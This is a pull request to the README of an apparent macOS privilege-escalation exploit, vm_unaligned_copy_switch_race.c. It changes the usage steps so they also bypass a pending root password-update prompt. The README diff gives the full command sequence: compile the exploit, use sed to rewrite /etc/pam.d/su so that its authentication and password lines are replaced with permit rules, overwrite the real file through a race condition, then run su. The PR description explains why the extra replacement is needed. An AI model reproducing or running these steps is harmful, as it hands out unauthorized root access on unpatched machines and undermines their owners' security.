### PR TITLE
README.md: change sed command to bypass update passwd dialog

### DIFF
--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@ On a macOS 13.0.1 / 12.6.1 (or below) machine, run:
 
 ```
 clang -o switcharoo vm_unaligned_copy_switch_race.c
-sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
+sed -e "s/rootok/permit/g" -e "s/\(password.*\)opendirectory.so/\1permit.so       /g" /etc/pam.d/su > overwrite_file.bin
 ./switcharoo /etc/pam.d/su overwrite_file.bin
 su
 ```


### PR DESCRIPTION
If the root user has a passwd update pending, changing only the 'auth sufficient' line will bypass the initial verification, but the user will be trapped by the update passwd dialog, which asks for the old one. To avoid this, overwriting the 'password required' line is also necessary, so the passwd update dialog is bypassed too.